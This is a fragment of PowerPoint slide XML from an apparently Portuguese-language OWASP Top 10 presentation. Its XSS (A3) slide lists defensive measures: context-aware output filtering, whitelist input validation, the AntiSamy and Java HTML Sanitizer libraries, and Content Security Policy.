              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A opção apropriada é </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filtrar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>adequadamente todos os dados não-confiáveis com base no contexto HTML (corpo, atributo, JavaScript, CSS ou URL) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>no qual os </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dados </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>serão colocados. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Veja o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>OWASP XSS Prevention Cheat Sheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> para detalhes sobre os </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>requisitos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>técnicas de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filtro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de dados. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“Lista branca" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ou validação de entrada positiva </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>também é recomendada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pois ajuda a proteger contra XSS, mas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>não é uma defesa completa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>já que muitas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aplicações requerem caracteres especiais em sua entrada. Tal validação deve, tanto quanto possível, validar o tamanho, caracteres, formato, e as regras de negócio sobre os dados antes de aceitar a entrada.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Para conteúdo rico considere bibliotecas de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>auto-sanitização </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>como OWASP's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>AntiSamy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ou o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>Java HTML Sanitizer Project</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Considere a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>Content Security Policy (CSP)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>para se defender contra XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>em todo o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>seu site.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Placeholder 26"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:t>A3</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="76200"/>
            <a:ext cx="5486400" cy="762000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="Group 26"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="15159" y="1014413"/>
            <a:ext cx="6669804" cy="525268"/>
            <a:chOff x="14975" y="1014596"/>
            <a:chExt cx="6670153" cy="525104"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="29" name="Group 28"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="14975" y="1014596"/>
              <a:ext cx="6670153" cy="525104"/>
              <a:chOff x="14975" y="997424"/>
              <a:chExt cx="6670153" cy="525104"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="34" name="Rectangle 116"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2879691" y="1073600"/>
                <a:ext cx="1020816" cy="380881"/>
              </a:xfrm>
              <a:prstGeom prst="rect">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a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Vulnerabilidades</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t/>
                </a:r>
                <a:br>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>        de Segurança</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="35" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="476250" y="997424"/>
                <a:ext cx="139700" cy="304800"/>
                <a:chOff x="96" y="1344"/>
                <a:chExt cx="288" cy="624"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="44" name="Oval 64"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="145" y="1344"/>
                  <a:ext cx="190" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050" algn="ctr">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="45" name="Line 65"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1536"/>
                  <a:ext cx="0" cy="240"/>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46" name="Line 66"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="96" y="1776"/>
                  <a:ext cx="144" cy="192"/>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47" name="Line 67"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1776"/>
                  <a:ext cx="144" cy="192"/>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48" name="Line 68"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="96" y="1633"/>
                  <a:ext cx="288" cy="0"/>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grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36" name="AutoShape 163"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1309572" y="1078361"/>
                <a:ext cx="838244" cy="357076"/>
              </a:xfrm>
              <a:prstGeom prst="rightArrowCallout">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 20889"/>
                  <a:gd name="adj2" fmla="val 24667"/>
                  <a:gd name="adj3" fmla="val 34667"/>
                  <a:gd name="adj4" fmla="val 8013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Vetores </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> de Ataque</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="37" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4800666" y="1049795"/>
                <a:ext cx="685836" cy="428491"/>
              </a:xfrm>
              <a:prstGeom prst="can">
                <a:avLst>
                  <a:gd name="adj" fmla="val 250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Impactos</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>  Técnicos</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="38" name="AutoShape 108"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="761855" y="1262453"/>
                <a:ext cx="535016" cy="1588"/>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39" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="2189093" y="1262453"/>
                <a:ext cx="630270" cy="1588"/>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40" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="34" idx="3"/>
                <a:endCxn id="37" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="3900507" y="1264041"/>
                <a:ext cx="900159"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sp>
            <p:nvSpPr>
              <p:cNvPr id="41" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="14975" y="1322855"/>
                <a:ext cx="1132100" cy="199673"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>Agentes </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>de </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>Ameaça</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="42" name="AutoShape 142"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5923088" y="1073600"/>
                <a:ext cx="762040" cy="380881"/>
              </a:xfrm>
              <a:prstGeom prst="foldedCorner">
                <a:avLst>
                  <a:gd name="adj" fmla="val 125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lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Impactos</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>no Negócio</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="43" name="AutoShape 149"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="37" idx="4"/>
                <a:endCxn id="42" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5486502" y="1264041"/>
                <a:ext cx="436586"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
          <p:nvSpPr>
            <p:cNvPr id="30" name="AutoShape 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2879691" y="1090772"/>
              <a:ext cx="220675" cy="380881"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrowCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 47538"/>
                <a:gd name="adj2" fmla="val 51293"/>
                <a:gd name="adj3" fmla="val 57006"/>
                <a:gd name="adj4" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>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endParaRPr lang="pt-BR" sz="900" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Rectangle 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2862228" y="1235189"/>
              <a:ext cx="109543" cy="9522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dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37947030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5" name="Table 104"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1618114243"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="952500"/>
          <a:ext cx="6858000" cy="2759240"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
              </a:tblGrid>
              <a:tr h="595164">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45719" marB="45719">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a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45719" marB="45719">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gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
